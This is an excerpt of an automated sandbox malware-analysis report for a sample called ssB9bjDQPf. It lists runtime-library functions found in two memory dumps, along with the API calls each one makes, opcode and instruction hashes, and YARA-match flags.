                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: __alldvrm$_strrchr
                                                    • String ID:
                                                    • API String ID: 1036877536-0
                                                    • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                    • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
                                                    • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                    • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                    Function 02525AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __alldvrm$_strrchr
                                                    • String ID:
                                                    • API String ID: 1036877536-0
                                                    • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                    • Instruction ID: 9d81ed378f210f101acab280f8335f5080636a3ffff2f394150189643d88bcde
                                                    • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                    • Instruction Fuzzy Hash: 5BA148729007A69FD71A8F28C8857AEBFE1FF53310F54416DD4859B2C1E3348A49CB58
                                                    Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                    • Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
                                                    • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                    • Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
                                                    Function 0252FC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID:
                                                    • API String ID: 269201875-0
                                                    • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                    • Instruction ID: 6619548f8ecfa72452bce880e786e65f3b03d2b6d62c0071c039aed94688633b
                                                    • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                    • Instruction Fuzzy Hash: E941FB31A001326BEB256FB8EC45AAE3B76FF87770F240615F828D65D0D77448498AAD
                                                    Function 02526B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0252047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 02526B51
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02526BDA
                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02526BEC
                                                    • __freea.LIBCMT ref: 02526BF5
                                                      • Part of subcall function 0252390E: RtlAllocateHeap.NTDLL(00000000,024FDAD7,00000000), ref: 02523940
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                    • String ID:
                                                    • API String ID: 2652629310-0
                                                    • Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                    • Instruction ID: e16fc0060b2116cb141701702c4396ad0f2cea7a393e2f42db01020523b92277
                                                    • Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                    • Instruction Fuzzy Hash: 8731DE72A0022AABDF248F64CC80DAE7BA9FF41714F054268FC04DB1D0EB35D959CB94
                                                    Function 0040D3EB Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                    • String ID:
                                                    • API String ID: 531285432-0
                                                    • Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                    • Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
                                                    • Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                    • Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5
                                                    Function 024FD652 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                    • String ID:
                                                    • API String ID: 531285432-0
                                                    • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                    • Instruction ID: 7c3cf0bf3eda9c87ed3757d45915f23a9ec52cc68987ad8dc06e3129f2551feb
                                                    • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                    • Instruction Fuzzy Hash: B3215175E00209AFDF40EF95CC819BEBBB9EF89714F10006AE601A72A0D770AD01CF91
                                                    Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetEvent.KERNEL32(?,00000000), ref: 00423739
                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
                                                      • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                    • String ID:
                                                    • API String ID: 2630251706-0
                                                    • Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                    • Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
                                                    • Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                    • Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98
                                                    Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShowWindow.USER32(00000005), ref: 00401FAF
                                                    • UpdateWindow.USER32 ref: 00401FB7
                                                    • ShowWindow.USER32(00000000), ref: 00401FCB
                                                    • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$MoveUpdate
                                                    • String ID:
                                                    • API String ID: 1339878773-0
                                                    • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                    • Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
                                                    • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                    • Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C
                                                    Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
                                                      • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
                                                      • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
                                                    • _UnwindNestedFrames.LIBCMT ref: 004290F8
                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00429131
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                    • String ID:
                                                    • API String ID: 737400349-0
                                                    • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                    • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                    • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                    • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
                                                    Function 02519330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0251934A
                                                      • Part of subcall function 02519297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 025192C6
                                                      • Part of subcall function 02519297: ___AdjustPointer.LIBCMT ref: 025192E1
                                                    • _UnwindNestedFrames.LIBCMT ref: 0251935F
                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02519370
                                                    • CallCatchBlock.LIBVCRUNTIME ref: 02519398
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                    • String ID:
                                                    • API String ID: 737400349-0
                                                    • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                    • Instruction ID: 5fcaba44cfb3c7a17613419202aa68f815ddf28f59c07a2ce60f47e593805159
                                                    • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                    • Instruction Fuzzy Hash: A301D37210014ABBEF126E95CC41EEB7F6AFF88754F044418FE58A6120D736E861EBA4
                                                    Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
                                                    • GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID:
                                                    • API String ID: 3177248105-0
                                                    • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                    • Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
                                                    • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                    • Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC
                                                    Function 02525196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0252513D,00000000,00000000,00000000,00000000,?,025253F5,00000006,0044A378), ref: 025251C8
                                                    • GetLastError.KERNEL32(?,0252513D,00000000,00000000,00000000,00000000,?,025253F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,02522213), ref: 025251D4
                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0252513D,00000000,00000000,00000000,00000000,?,025253F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 025251E2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID:
                                                    • API String ID: 3177248105-0
                                                    • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                    • Instruction ID: 65f21256a08ef282db8136ea20145121d6504f4f7d6c72b4fa9d6a8ec542418b
                                                    • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                    • Instruction Fuzzy Hash: 6001F236612332ABC7254F69AC44E56BF98BF47FA27500630F946E71C0E720D908CAEC
                                                    Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
                                                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                    • String ID:
                                                    • API String ID: 78362717-0
                                                    • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                    • Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
                                                    • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                    • Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
                                                    Function 02516395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 025163AF
                                                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 025163C3
                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 025163DB
                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 025163F3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                    • String ID:
                                                    • API String ID: 78362717-0
                                                    • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                    • Instruction ID: 34c929fcf68a8fe8e2f5e8b835268fc35d29786d965fb3efd239c3f3134a4376
                                                    • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                    • Instruction Fuzzy Hash: 1801F936610125BBEF16EE59C880FEF779EBF85360F000015EC21A7381DAB0ED10CAA8
                                                    Function 02512B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::location::_Assign.LIBCMT ref: 02512BB1
                                                    • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02512BCF
                                                      • Part of subcall function 02508687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 025086A8
                                                      • Part of subcall function 02508687: Hash.LIBCMT ref: 025086E8
                                                    • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02512BD8
                                                    • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02512BF8
                                                      • Part of subcall function 0250F6DF: Hash.LIBCMT ref: 0250F6F1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                    • String ID:
                                                    • API String ID: 2250070497-0
                                                    • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                    • Instruction ID: d89a8d4ee6685c06904dd67ce6cdf2d9d8173378abc9cde2c241bbd99f0c74ff
                                                    • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                    • Instruction Fuzzy Hash: AB118E76800604AFC715DFA4C880ECAF7B9BF99320F014A1EEA56C7591DB70E904CFA4
                                                    Function 02512B91 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::location::_Assign.LIBCMT ref: 02512BB1
                                                    • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02512BCF
                                                      • Part of subcall function 02508687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 025086A8
                                                      • Part of subcall function 02508687: Hash.LIBCMT ref: 025086E8
                                                    • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02512BD8
                                                    • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02512BF8
                                                      • Part of subcall function 0250F6DF: Hash.LIBCMT ref: 0250F6F1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                    • String ID:
                                                    • API String ID: 2250070497-0
                                                    • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                    • Instruction ID: 058a89d7303aeaf489164443d2d0013101fca441b79a80ad3a8e5f3831df67fa
                                                    • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                    • Instruction Fuzzy Hash: 0B011B76500605ABC724DFA5C881EDAB7E9BF98310F108A1EE65687590DB70F5448F64
                                                    Function 0040591F Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog3_GS.LIBCMT ref: 00405926
                                                      • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
                                                    • __Getcoll.LIBCPMT ref: 00405980
                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                    • String ID:
                                                    • API String ID: 1836011271-0
                                                    • Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                    • Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
                                                    • Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                    • Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
                                                    Function 024F50CA Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog3_GS.LIBCMT ref: 024F50D1
                                                      • Part of subcall function 024FBDAE: __EH_prolog3_GS.LIBCMT ref: 024FBDB5
                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 024F511C
                                                    • __Getcoll.LIBCPMT ref: 024F512B
                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024F513B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                    • String ID:
                                                    • API String ID: 1836011271-0
                                                    • Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                    • Instruction ID: 49ed4b78a4a657679f6df88499d8d91cfc116898cf28d2fd104d30e20320ddff
                                                    • Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                    • Instruction Fuzzy Hash: 6D018872D10209AFDB80EFA4C980BAEB7B1BF94315F51802ED255AB280DB749544CF95
                                                    Function 024F5B86 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog3_GS.LIBCMT ref: 024F5B8D
                                                      • Part of subcall function 024FBDAE: __EH_prolog3_GS.LIBCMT ref: 024FBDB5
                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 024F5BD8
                                                    • __Getcoll.LIBCPMT ref: 024F5BE7
                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024F5BF7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                    • String ID:
                                                    • API String ID: 1836011271-0
                                                    • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                    • Instruction ID: 5add014a910186434b5806f2a4106405ce99bca981c5b3baf541dfd7ae3b1b75
                                                    • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                    • Instruction Fuzzy Hash: AC0188729002099FDB80EFA4C480BAEB7B1BF84315F50802ED255AB280DBB89944CF95
                                                    Function 0041BED7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Compare_exchange_acquire_4std::_
                                                    • String ID:
                                                    • API String ID: 3973403980-0
                                                    • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                    • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                    • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                    • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                    Function 0250C13E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0250C170
                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0250C180
                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0250C190
                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0250C1A4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Compare_exchange_acquire_4std::_
                                                    • String ID:
                                                    • API String ID: 3973403980-0
                                                    • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                    • Instruction ID: 6b885dc433c1a0a3059363f2378e5221478797f1c2d1f38af764c65e248a232e
                                                    • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                    • Instruction Fuzzy Hash: 7F01CD7A404149BBDF129E94DC818AD3F66FF56352F448613F919841F0D732CA70EB89
